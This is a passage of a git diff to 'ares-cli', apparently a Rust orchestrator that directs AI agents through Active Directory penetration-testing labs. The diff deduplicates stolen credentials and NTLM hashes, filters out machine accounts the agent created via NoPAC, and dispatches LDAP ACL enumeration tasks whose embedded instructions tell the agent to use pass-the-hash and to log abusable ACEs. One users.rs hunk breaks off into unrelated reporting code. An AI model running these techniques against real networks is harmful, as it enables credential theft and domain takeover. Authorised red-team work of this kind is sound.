- cleaned.domain = strip_trailing_dot(cleaned.domain.trim()).to_lowercase();
+ cleaned.domain = domain;
cleaned.hash_type = normalize_hash_type(&cleaned.hash_type);
cleaned.hash_value = hash_value.trim().to_string();
cleaned.username = strip_ansi(&cleaned.username);
diff --git a/ares-cli/src/dedup/mod.rs b/ares-cli/src/dedup/mod.rs
index 9ae3550e..78f78211 100644
--- a/ares-cli/src/dedup/mod.rs
+++ b/ares-cli/src/dedup/mod.rs
@@ -7,9 +7,32 @@ pub(crate) mod users;
#[cfg(test)]
mod tests;
-/// Strip trailing DNS root dot from domain strings (e.g. `child.contoso.local.` → `child.contoso.local`).
+use regex::Regex;
+use std::sync::LazyLock;
+
+/// Strip trailing DNS root dot and NetExec "0." artifact from domain strings
+/// (e.g. `child.contoso.local.` → `child.contoso.local`,
+/// `contoso.local0` → `contoso.local`).
pub(super) fn strip_trailing_dot(s: &str) -> &str {
- s.strip_suffix('.').unwrap_or(s)
+ let s = s.trim_end_matches('.');
+ // NetExec sometimes appends "0" to domain TLDs. Strip if the char
+ // before the trailing 0 is alphabetic (i.e. TLD-like, not "host10").
+ match s.strip_suffix('0') {
+ Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean,
+ _ => s,
+ }
+}
+
+/// Auto-generated Windows hostname pattern (`WIN-` + 11 alphanumerics + optional `$`).
+/// Used to filter ghost machine accounts that the agent created itself via
+/// NoPAC / MachineAccountQuota — not real lab hosts, just our own residue.
+static GHOST_MACHINE_ACCOUNT_RE: LazyLock<Regex> =
+ LazyLock::new(|| Regex::new(r"(?i)^WIN-[A-Z0-9]{11}\$?$").unwrap());
+
+/// True if `username` looks like an auto-generated Windows machine account
+/// (e.g. `WIN-G9FWV8ZNSCL$`) — typically agent-created via NoPAC.
+pub(crate) fn is_ghost_machine_account(username: &str) -> bool {
+ GHOST_MACHINE_ACCOUNT_RE.is_match(username.trim())
}
pub(crate) use credentials::{dedup_credentials, sanitize_credentials};
diff --git a/ares-cli/src/dedup/tests.rs b/ares-cli/src/dedup/tests.rs
index 37741985..2570f229 100644
--- a/ares-cli/src/dedup/tests.rs
+++ b/ares-cli/src/dedup/tests.rs
@@ -361,6 +361,25 @@ fn strip_trailing_dot_removes_dot() {
assert_eq!(strip_trailing_dot("."), "");
}
+#[test]
+fn strip_trailing_dot_removes_netexec_zero_artifact() {
+ use super::strip_trailing_dot;
+ // NetExec appends "0" or "0." to domain names
+ assert_eq!(strip_trailing_dot("contoso.local0"), "contoso.local");
+ assert_eq!(strip_trailing_dot("contoso.local0."), "contoso.local");
+ assert_eq!(
+ strip_trailing_dot("child.contoso.local0"),
+ "child.contoso.local"
+ );
+ assert_eq!(strip_trailing_dot("fabrikam.local0."), "fabrikam.local");
+ // Must NOT strip real trailing 0 from hostnames like "host10"
+ assert_eq!(strip_trailing_dot("host10"), "host10");
+ assert_eq!(
+ strip_trailing_dot("dc10.contoso.local"),
+ "dc10.contoso.local"
+ );
+}
+
#[test]
fn strip_ansi_removes_escape_sequences() {
use super::credentials::strip_ansi;
@@ -621,6 +640,26 @@ fn normalize_state_domains_domain_filtering_based_on_host_fqdns() {
assert!(!domains.contains(&"orphan.local".to_string()));
}
+#[test]
+fn normalize_state_domains_drops_host_fqdn_masquerading_as_domain() {
+ // A parser/credential publish path sometimes pushes a DC's FQDN
+ // (e.g. `WIN-30DZ5NGFA7M.c26h.local`) into the domain set. The dedup
+ // filter must drop entries that exactly match a known host hostname,
+ // even when a user or credential has the FQDN in its `domain` field.
+ let users = vec![make_user("win-30dz5ngfa7m.c26h.local", "admin")];
+ let mut creds = vec![];
+ let mut hashes = vec![];
+ let mut domains = vec![
+ "c26h.local".to_string(),
+ "win-30dz5ngfa7m.c26h.local".to_string(),
+ ];
+ let hosts = vec![make_host("192.168.58.10", "win-30dz5ngfa7m.c26h.local")];
+
+ normalize_state_domains(&users, &mut creds, &mut hashes, &mut domains, &hosts, None);
+
+ assert_eq!(domains, vec!["c26h.local".to_string()]);
+}
+
#[test]
fn normalize_state_domains_domain_kept_from_target_domain() {
// target_domain should cause that domain to be retained even without hosts/users.
@@ -1055,3 +1094,118 @@ fn dedup_credentials_normalizes_username_case() {
let deduped = dedup_credentials(&creds);
assert_eq!(deduped[0].username, "admin");
}
+
+#[test]
+fn is_ghost_machine_account_matches_nopac_pattern() {
+ use super::is_ghost_machine_account;
+ assert!(is_ghost_machine_account("WIN-G9FWV8ZNSCL$"));
+ assert!(is_ghost_machine_account("WIN-4D75DLR6UCC$"));
+ assert!(is_ghost_machine_account("win-bjak8xunhgd$"));
+ // without trailing $
+ assert!(is_ghost_machine_account("WIN-3KSGCLTS7NX"));
+}
+
+#[test]
+fn is_ghost_machine_account_rejects_real_hosts() {
+ use super::is_ghost_machine_account;
+ assert!(!is_ghost_machine_account("DC01$"));
+ assert!(!is_ghost_machine_account("WS01$"));
+ assert!(!is_ghost_machine_account("WIN-2019$")); // wrong length
+ assert!(!is_ghost_machine_account("administrator"));
+ assert!(!is_ghost_machine_account(""));
+}
+
+#[test]
+fn sanitize_credentials_drops_ghost_machine_accounts() {
+ let mut creds = vec![
+ make_cred("contoso.local", "WIN-G9FWV8ZNSCL$", "P@ss1"),
+ make_cred("contoso.local", "jdoe", "P@ss1"),
+ ];
+ sanitize_credentials(&mut creds);
+ assert_eq!(creds.len(), 1);
+ assert_eq!(creds[0].username, "jdoe");
+}
+
+#[test]
+fn dedup_hashes_collapses_bare_and_prefixed_same_user() {
+ // Parsers emit the same hash twice when secretsdump output mixes
+ // `Administrator:RID:...` (bare) and `DOMAIN\Administrator:RID:...` (prefixed)
+ // — bare gets empty domain, prefixed gets the resolved FQDN.
+ // The bare row should be folded into the prefixed one.
+ let hashes = vec![
+ make_hash("", "Administrator", "NTLM", "aabbccdd"),
+ make_hash("contoso.local", "Administrator", "NTLM", "aabbccdd"),
+ ];
+ let deduped = dedup_hashes(&hashes);
+ assert_eq!(deduped.len(), 1);
+ assert_eq!(deduped[0].domain, "contoso.local");
+}
+
+#[test]
+fn dedup_hashes_keeps_distinct_users_sharing_hash() {
+ // Two different users can end up with identical NTLMs (shared password).
+ // They must NOT be folded together — dedup keys on
+ // (username, hash_type, hash_value), not just (hash_type, hash_value).
+ let hashes = vec![
+ make_hash("contoso.local", "Administrator", "NTLM", "deadbeefcafe"),
+ make_hash("contoso.local", "svc_backup", "NTLM", "deadbeefcafe"),
+ ];
+ let deduped = dedup_hashes(&hashes);
+ assert_eq!(deduped.len(), 2);
+}
+
+#[test]
+fn dedup_hashes_bare_with_no_domain_sibling_kept() {
+ // If we only ever saw the bare form, we cannot infer a domain — keep it as-is.
+ let hashes = vec![make_hash("", "Administrator", "NTLM", "aabbccdd")];
+ let deduped = dedup_hashes(&hashes);
+ assert_eq!(deduped.len(), 1);
+ assert_eq!(deduped[0].domain, "");
+}
+
+#[test]
+fn dedup_hashes_picks_longest_domain_when_multiple_known() {
+ // If the same user+hash appears with both a parent and a child domain (rare
+ // cross-forest replication artifact), prefer the longer/more-specific FQDN
+ // when filling in a bare entry.
+ let hashes = vec![
+ make_hash("", "krbtgt", "NTLM", "deadbeef"),
+ make_hash("contoso.local", "krbtgt", "NTLM", "deadbeef"),
+ make_hash("child.contoso.local", "krbtgt", "NTLM", "deadbeef"),
+ ];
+ let deduped = dedup_hashes(&hashes);
+ // The bare entry folds into the longest sibling; the two populated entries stay distinct.
+ assert_eq!(deduped.len(), 2);
+ let domains: Vec<&str> = deduped.iter().map(|h| h.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"child.contoso.local"));
+}
+
+#[test]
+fn dedup_hashes_drops_ghost_machine_accounts() {
+ let hashes = vec![
+ make_hash(
+ "contoso.local",
+ "WIN-4D75DLR6UCC$",
+ "NTLM",
+ "aad3b435b51404eeaad3b435b51404ee:da118ed665879916ceaacfb98e3ee74e",
+ ),
+ make_hash("contoso.local", "admin", "NTLM", "aabb"),
+ ];
+ let deduped = dedup_hashes(&hashes);
+ assert_eq!(deduped.len(), 1);
+ assert_eq!(deduped[0].username, "admin");
+}
+
+#[test]
+fn dedup_users_drops_ghost_machine_accounts() {
+ let nb = HashMap::new();
+ let mut ghost = make_user("contoso.local", "WIN-BJAK8XUNHGD$");
+ ghost.source = "kerberos_enum".to_string();
+ let mut real = make_user("contoso.local", "jdoe");
+ real.source = "kerberos_enum".to_string();
+ let users = vec![ghost, real];
+ let deduped = dedup_users(&users, &nb);
+ assert_eq!(deduped.len(), 1);
+ assert_eq!(deduped[0].username, "jdoe");
+}
diff --git a/ares-cli/src/dedup/users.rs b/ares-cli/src/dedup/users.rs
index c8087de8..9bd4abdc 100644
--- a/ares-cli/src/dedup/users.rs
+++ b/ares-cli/src/dedup/users.rs
@@ -2,7 +2,7 @@ use std::collections::HashMap;
use ares_core::models::User;
-use super::strip_trailing_dot;
+use super::{is_ghost_machine_account, strip_trailing_dot};
/// Noise usernames that should be filtered.
pub(super) const NOISE_USERNAMES: &[&str] = &[
@@ -81,6 +81,7 @@ pub(crate) fn dedup_users(users: &[User], netbios_to_fqdn: &HashMap<String, String>,
exploited: &HashSet<String>,
@@ -303,20 +308,57 @@ fn print_vulnerabilities(
return;
}
- let mut vulns: Vec<(&String, &VulnerabilityInfo)> = discovered.iter().collect();
- vulns.sort_by(|a, b| {
- a.1.priority
- .cmp(&b.1.priority)
- .then(a.1.vuln_type.cmp(&b.1.vuln_type))
- });
+ let mut exploitable: Vec<(&String, &VulnerabilityInfo)> = Vec::new();
+ let mut findings: Vec<(&String, &VulnerabilityInfo)> = Vec::new();
+ for (id, vuln) in discovered.iter() {
+ if vuln.priority <= EXPLOITABLE_PRIORITY_MAX {
+ exploitable.push((id, vuln));
+ } else {
+ findings.push((id, vuln));
+ }
+ }
+ let sort_vulns = |vulns: &mut Vec<(&String, &VulnerabilityInfo)>| {
+ vulns.sort_by(|a, b| {
+ a.1.priority
+ .cmp(&b.1.priority)
+ .then(a.1.vuln_type.cmp(&b.1.vuln_type))
+ });
+ };
+ sort_vulns(&mut exploitable);
+ sort_vulns(&mut findings);
+
+ let exploited_in_exploitable = exploitable
+ .iter()
+ .filter(|(id, _)| exploited.contains(*id))
+ .count();
- println!("Discovered Vulnerabilities ({}):", vulns.len());
+ println!(
+ "Exploitable Vulnerabilities ({}, {} exploited):",
+ exploitable.len(),
+ exploited_in_exploitable
+ );
+ if exploitable.is_empty() {
+ println!(" (none)");
+ } else {
+ print_vuln_table(&exploitable, exploited);
+ }
+ println!();
+
+ println!("Findings ({}):", findings.len());
+ if !findings.is_empty() {
+ print_vuln_table(&findings, exploited);
+ }
+ println!();
+}
+
+/// Render a single vulnerability table body (header + rows).
+fn print_vuln_table(vulns: &[(&String, &VulnerabilityInfo)], exploited: &HashSet<String>) {
println!(
" {:<30} {:<20} {:>8} {:>9} Details",
"Type", "Target", "Priority", "Exploited"
);
println!(" {}", "-".repeat(100));
- for (vuln_id, vuln) in &vulns {
+ for (vuln_id, vuln) in vulns {
let is_exploited = exploited.contains(*vuln_id);
let exploited_mark = if is_exploited { "\u{2713}" } else { "\u{2717}" };
@@ -336,7 +378,6 @@ fn print_vulnerabilities(
vuln.vuln_type, vuln.target, vuln.priority, exploited_mark, details_display
);
}
- println!();
}
/// Format vulnerability details HashMap into a readable string.
@@ -422,10 +463,12 @@ fn print_attack_path(timeline_events: &[serde_json::Value]) {
.and_then(|v| v.as_str())
.unwrap_or("unknown event");
+ let already_critical = description.starts_with("CRITICAL:");
let desc_lower = description.to_lowercase();
- let is_critical = desc_lower.contains("krbtgt")
- || (desc_lower.contains("administrator") && desc_lower.contains("hash"))
- || desc_lower.contains("domain admin");
+ let is_critical = !already_critical
+ && (desc_lower.contains("krbtgt")
+ || (desc_lower.contains("administrator") && desc_lower.contains("hash"))
+ || desc_lower.contains("domain admin"));
let prefix = if is_critical { "CRITICAL: " } else { "" };
let mitre = extract_mitre_from_event(event);
diff --git a/ares-cli/src/orchestrator/automation/acl.rs b/ares-cli/src/orchestrator/automation/acl.rs
index 6571c836..ad710096 100644
--- a/ares-cli/src/orchestrator/automation/acl.rs
+++ b/ares-cli/src/orchestrator/automation/acl.rs
@@ -5,9 +5,9 @@ use std::time::Duration;
use serde_json::json;
use tokio::sync::watch;
-use tracing::{info, warn};
+use tracing::{debug, info, warn};
-use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::dispatcher::{Dispatcher, SubmissionOutcome};
use crate::orchestrator::state::*;
/// Extract steps from an ACL chain JSON value.
@@ -141,29 +141,45 @@ pub async fn auto_acl_chain_follow(
});
let priority = dispatcher.effective_priority("acl_abuse");
- match dispatcher
- .throttled_submit("acl_chain_step", "acl", payload, priority)
+ // Mark dedup on Submitted OR Deferred — Deferred means the task is
+ // safely in the deferred ZSET and the drain will retry it. Without
+ // this, the next 30s tick re-emits the same step and the deferred
+ // ZSET hits its per-type cap, silently dropping work.
+ let mark_dedup = match dispatcher
+ .throttled_submit_outcome("acl_chain_step", "acl", payload, priority)
.await
{
- Ok(Some(task_id)) => {
+ Ok(SubmissionOutcome::Submitted(task_id)) => {
info!(
task_id = %task_id,
step_key = %dedup_key,
"ACL chain step dispatched"
);
- // Mark as dispatched in both in-memory set and dedup
- {
- let mut state = dispatcher.state.write().await;
- state.dispatched_acl_steps.insert(dedup_key.clone());
- state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone());
- }
- let _ = dispatcher
- .state
- .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key)
- .await;
+ true
+ }
+ Ok(SubmissionOutcome::Deferred) => {
+ debug!(step_key = %dedup_key, "ACL chain step deferred (will retry via deferred drain)");
+ true
+ }
+ Ok(SubmissionOutcome::Dropped) => {
+ debug!(step_key = %dedup_key, "ACL chain step dropped (will reconsider next tick)");
+ false
+ }
+ Err(e) => {
+ warn!(err = %e, "Failed to dispatch ACL chain step");
+ false
+ }
+ };
+ if mark_dedup {
+ {
+ let mut state = dispatcher.state.write().await;
+ state.dispatched_acl_steps.insert(dedup_key.clone());
+ state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone());
}
- Ok(None) => {} // deferred or throttled
- Err(e) => warn!(err = %e, "Failed to dispatch ACL chain step"),
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key)
+ .await;
}
}
}
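Aside (not part of the diff): the hunk above leans on a three-way submit outcome. A minimal sketch of the policy it encodes; the enum shape and the `std::io::Error` placeholder are assumptions inferred from the call site, not copied from `dispatcher.rs`:

```rust
/// Assumed shape: Submitted carries the task id; Deferred means the task is
/// safely in the deferred ZSET and will be retried; Dropped means throttled away.
enum SubmissionOutcome {
    Submitted(String),
    Deferred,
    Dropped,
}

/// Dedup policy from the hunk above: mark the step as processed whenever the
/// queue durably owns the task (Submitted or Deferred); leave it eligible for
/// the next tick when it was Dropped or the submit errored.
fn should_mark_dedup(outcome: &Result<SubmissionOutcome, std::io::Error>) -> bool {
    matches!(
        outcome,
        Ok(SubmissionOutcome::Submitted(_)) | Ok(SubmissionOutcome::Deferred)
    )
}

fn main() {
    assert!(should_mark_dedup(&Ok(SubmissionOutcome::Submitted("t-1".into()))));
    assert!(should_mark_dedup(&Ok(SubmissionOutcome::Deferred)));
    assert!(!should_mark_dedup(&Ok(SubmissionOutcome::Dropped)));
}
```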
@@ -174,6 +190,8 @@ mod tests {
use super::*;
use serde_json::json;
+ // --- extract_chain_steps ---
+
#[test]
fn extract_chain_steps_from_array() {
let chain = json!([{"source": "a"}, {"source": "b"}]);
@@ -213,6 +231,8 @@ mod tests {
assert!(extract_chain_steps(&chain).is_none());
}
+ // --- extract_source_user ---
+
#[test]
fn extract_source_user_from_source_key() {
let step = json!({"source": "admin"});
@@ -249,6 +269,8 @@ mod tests {
assert_eq!(extract_source_user(&step), "");
}
+ // --- extract_source_domain ---
+
#[test]
fn extract_source_domain_from_source_domain_key() {
let step = json!({"source_domain": "contoso.local"});
@@ -279,6 +301,8 @@ mod tests {
assert_eq!(extract_source_domain(&step), "");
}
+ // --- acl_step_dedup_key ---
+
#[test]
fn acl_step_dedup_key_basic() {
assert_eq!(acl_step_dedup_key(0, 0), "chain:0:step:0");
diff --git a/ares-cli/src/orchestrator/automation/acl_discovery.rs b/ares-cli/src/orchestrator/automation/acl_discovery.rs
new file mode 100644
index 00000000..7a75814c
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/acl_discovery.rs
@@ -0,0 +1,812 @@
+//! auto_acl_discovery -- discover ACL attack paths via targeted LDAP queries.
+//!
+//! Bridges the gap between BloodHound collection and ACL exploitation.
+//! BloodHound collects data, but the ACL chain analysis must be extracted
+//! and registered as discovered_vulnerabilities for `auto_dacl_abuse` to
+//! exploit.
+//!
+//! This module dispatches `ldap_acl_enumeration` tasks per domain to:
+//! 1. Query nTSecurityDescriptor on user/group/computer objects
+//! 2. Identify dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword,
+//! GenericWrite, WriteOwner, Self-Membership)
+//! 3. Register discovered ACL paths as vulnerabilities
+//!
+//! Interval: 30s tick after a 45s initial wait (heavy LDAP query, don't run too frequently).
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// The dangerous ACE types we want the recon agent to identify.
+const DANGEROUS_ACE_TYPES: &[&str] = &[
+ "GenericAll",
+ "GenericWrite",
+ "WriteDacl",
+ "WriteOwner",
+ "ForceChangePassword",
+ "Self-Membership",
+ "WriteMember",
+ "AllExtendedRights",
+ "WriteProperty",
+];
+
+/// Collect ACL discovery work items from current state.
+///
+/// Pure logic extracted from `auto_acl_discovery` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_acl_discovery_work(state: &StateInner) -> Vec<AclDiscoveryWork> {
+ if state.credentials.is_empty() && state.hashes.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ // Skip dominated domains — once we own a domain there is nothing left
+ // for ACL escalation to discover there. Cross-trust ACL paths against
+ // un-owned domains still fire (they iterate other entries in
+ // all_domains_with_dcs).
+ if state.dominated_domains.contains(domain) {
+ continue;
+ }
+ // Use separate dedup keys for cred vs hash attempts so a failed
+ // password-based attempt (e.g., mislabeled credential domain)
+ // doesn't permanently block the hash-based path.
+ let dedup_key_cred = format!("acl_disc:{}:cred", domain.to_lowercase());
+ let dedup_key_hash = format!("acl_disc:{}:hash", domain.to_lowercase());
+ let dedup_key_trust = format!("acl_disc:{}:trust", domain.to_lowercase());
+
+ // Prefer same-domain cleartext cred, then fall back to trust-compatible
+ // cred (child→parent or cross-forest). Trust-based attempts use a
+ // separate dedup key so they don't block hash-based fallback.
+ let (cred, using_trust_cred) = if !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_cred)
+ {
+ let c = state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && c.domain.to_lowercase() == domain.to_lowercase()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .cloned();
+ (c, false)
+ } else {
+ (None, false)
+ };
+ let (cred, using_trust_cred) =
+ if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_trust) {
+ match state.find_trust_credential(domain) {
+ Some(c) => (Some(c), true),
+ None => (None, using_trust_cred),
+ }
+ } else {
+ (cred, using_trust_cred)
+ };
+
+ // Look for NTLM hash (PTH) — fires independently of cred attempt
+ let (ntlm_hash, ntlm_hash_username) =
+ if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_hash) {
+ state
+ .hashes
+ .iter()
+ .find(|h| {
+ h.hash_type.to_lowercase() == "ntlm"
+ && h.domain.to_lowercase() == domain.to_lowercase()
+ && h.username.to_lowercase() == "administrator"
+ })
+ .or_else(|| {
+ state.hashes.iter().find(|h| {
+ h.hash_type.to_lowercase() == "ntlm"
+ && h.domain.to_lowercase() == domain.to_lowercase()
+ && !state.is_delegation_account(&h.username)
+ })
+ })
+ .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone())))
+ .unwrap_or((None, None))
+ } else {
+ (None, None)
+ };
+
+ // Need at least a credential or an NTLM hash
+ if cred.is_none() && ntlm_hash.is_none() {
+ continue;
+ }
+
+ let dedup_key = if ntlm_hash.is_some() {
+ dedup_key_hash
+ } else if using_trust_cred {
+ dedup_key_trust
+ } else {
+ dedup_key_cred
+ };
+
+ // Collect known users in this domain to check ACEs against.
+        let domain_users: Vec<String> = state
+ .credentials
+ .iter()
+ .filter(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .map(|c| c.username.clone())
+ .collect();
+
+ items.push(AclDiscoveryWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred.unwrap_or_else(|| ares_core::models::Credential {
+ id: String::new(),
+ username: ntlm_hash_username.clone().unwrap_or_default(),
+ password: String::new(),
+ domain: domain.clone(),
+ source: "hash_fallback".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }),
+ known_users: domain_users,
+ ntlm_hash,
+ ntlm_hash_username,
+ });
+ }
+
+ items
+}
+
+/// Dispatches LDAP ACE enumeration per domain to discover ACL attack paths.
+/// Only runs after BloodHound collection has been dispatched (to avoid
+/// duplicating effort).
+pub async fn auto_acl_discovery(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ info!("auto_acl_discovery: spawned, waiting 45s for initial recon");
+
+ // Wait for initial recon to populate domain controllers.
+ tokio::time::sleep(Duration::from_secs(45)).await;
+
+ info!("auto_acl_discovery: initial wait complete, entering main loop");
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("acl_discovery") {
+ debug!("auto_acl_discovery: technique not allowed");
+ continue;
+ }
+
+        let work: Vec<AclDiscoveryWork> = {
+ let state = dispatcher.state.read().await;
+ let dcs = state.all_domains_with_dcs();
+ let creds = state.credentials.len();
+ let hashes = state.hashes.len();
+ info!(
+ dc_count = dcs.len(),
+ creds, hashes, "auto_acl_discovery: tick"
+ );
+ collect_acl_discovery_work(&state)
+ };
+
+ if work.is_empty() {
+ debug!("auto_acl_discovery: no work items");
+ } else {
+ info!(
+ count = work.len(),
+ "auto_acl_discovery: work items collected"
+ );
+ }
+
+ for item in work {
+ // When PTH hash is available, use the hash user's identity for the target domain
+ let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() {
+ (
+ item.ntlm_hash_username
+ .clone()
+ .unwrap_or_else(|| item.credential.username.clone()),
+ String::new(),
+ item.domain.clone(),
+ )
+ } else {
+ (
+ item.credential.username.clone(),
+ item.credential.password.clone(),
+ item.credential.domain.clone(),
+ )
+ };
+ let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase();
+ let mut payload = json!({
+ "technique": "ldap_acl_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": cred_user,
+ "password": cred_pass,
+ "domain": cred_domain,
+ },
+ "ace_types": DANGEROUS_ACE_TYPES,
+ "known_users": item.known_users,
+ "instructions": concat!(
+ "Enumerate ACL attack paths in this domain.\n\n",
+ "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ",
+ "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n",
+ " - Use ldap_search with the hash if it accepts one, OR\n",
+ " - Use rpcclient_command with the hash parameter to query DACLs via RPC.\n\n",
+ "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain, ",
+ "you MUST pass bind_domain= to ldap_search. ",
+ "Check the 'bind_domain' field in the task payload — if present, always pass it ",
+ "to ldap_search so the LDAP bind uses user@bind_domain.\n\n",
+ "If a password IS provided, use ldap_search with filter ",
+ "'(objectCategory=*)' and request the nTSecurityDescriptor attribute.\n\n",
+ "For each dangerous ACE found (GenericAll, WriteDacl, ForceChangePassword, ",
+ "GenericWrite, WriteOwner, Self-Membership on users/groups), register it as ",
+ "a vulnerability with EXACTLY these fields:\n",
+ " vuln_type: lowercase ACE type (e.g. 'forcechangepassword', 'genericall', ",
+ "'genericwrite', 'writedacl', 'writeowner', 'self_membership')\n",
+ " source: the user/group that HAS the permission (attacker)\n",
+ " target: the user/group/computer that is the TARGET (victim)\n",
+ " target_type: 'User', 'Group', or 'Computer'\n",
+ " domain: the domain where this ACE exists\n",
+ " source_domain: the domain of the source principal\n",
+ "Focus on ACEs where the source is a user we have credentials for.\n\n",
+ "IMPORTANT: Include ALL users discovered in the discovered_users array:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+ "\"source\": \"acl_discovery\"}"
+ ),
+ });
+ if cross_domain {
+ payload["bind_domain"] = json!(item.credential.domain);
+ }
+ if let Some(ref hash) = item.ntlm_hash {
+ payload["ntlm_hash"] = json!(hash);
+ }
+ if let Some(ref user) = item.ntlm_hash_username {
+ payload["hash_username"] = json!(user);
+ }
+
+ // ACL discovery is high-priority — it gates RBCD, shadow creds,
+ // and DACL abuse exploitation paths. Use priority 2 to compete
+ // with credential_access tasks rather than sitting behind them.
+ let priority = 2;
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ known_users = item.known_users.len(),
+ "ACL discovery dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_ACL_DISCOVERY, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_ACL_DISCOVERY, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ // Don't mark dedup on defer — the deferred queue will
+ // retry and we need the work item to remain eligible in
+ // case the deferred task never dispatches. Duplicate
+ // enqueues to the deferred queue are harmless (it dedupes
+ // by payload hash).
+ debug!(domain = %item.domain, "ACL discovery deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch ACL discovery");
+ }
+ }
+ }
+ }
+}
+
+struct AclDiscoveryWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+    known_users: Vec<String>,
+    ntlm_hash: Option<String>,
+    ntlm_hash_username: Option<String>,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+ use ares_core::models::Credential;
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key_cred = format!("acl_disc:{}:cred", "contoso.local");
+ let key_hash = format!("acl_disc:{}:hash", "contoso.local");
+ assert_eq!(key_cred, "acl_disc:contoso.local:cred");
+ assert_eq!(key_hash, "acl_disc:contoso.local:hash");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_ACL_DISCOVERY, "acl_discovery");
+ }
+
+ #[test]
+ fn dangerous_ace_types_not_empty() {
+ assert!(!DANGEROUS_ACE_TYPES.is_empty());
+ }
+
+ #[test]
+ fn dangerous_ace_types_contains_key_types() {
+ assert!(DANGEROUS_ACE_TYPES.contains(&"GenericAll"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"WriteDacl"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"ForceChangePassword"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"GenericWrite"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"WriteOwner"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"Self-Membership"));
+ }
+
+ #[test]
+ fn dangerous_ace_types_count() {
+ assert_eq!(DANGEROUS_ACE_TYPES.len(), 9);
+ }
+
+ #[test]
+ fn dangerous_ace_types_includes_write_property() {
+ assert!(DANGEROUS_ACE_TYPES.contains(&"WriteProperty"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"AllExtendedRights"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"WriteMember"));
+ }
+
+ #[test]
+ fn dangerous_ace_types_no_duplicates() {
+ let mut seen = std::collections::HashSet::new();
+ for ace in DANGEROUS_ACE_TYPES {
+ assert!(seen.insert(*ace), "Duplicate ACE type: {ace}");
+ }
+ }
+
+ #[test]
+ fn dedup_key_case_normalized() {
+ let key1 = format!("acl_disc:{}", "CONTOSO.LOCAL".to_lowercase());
+ let key2 = format!("acl_disc:{}", "contoso.local");
+ assert_eq!(key1, key2);
+ }
+
+ #[test]
+ fn acl_discovery_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "ldap_acl_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ "ace_types": DANGEROUS_ACE_TYPES,
+ "known_users": ["admin", "jdoe"],
+ });
+ assert_eq!(payload["technique"], "ldap_acl_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ let ace_types = payload["ace_types"].as_array().unwrap();
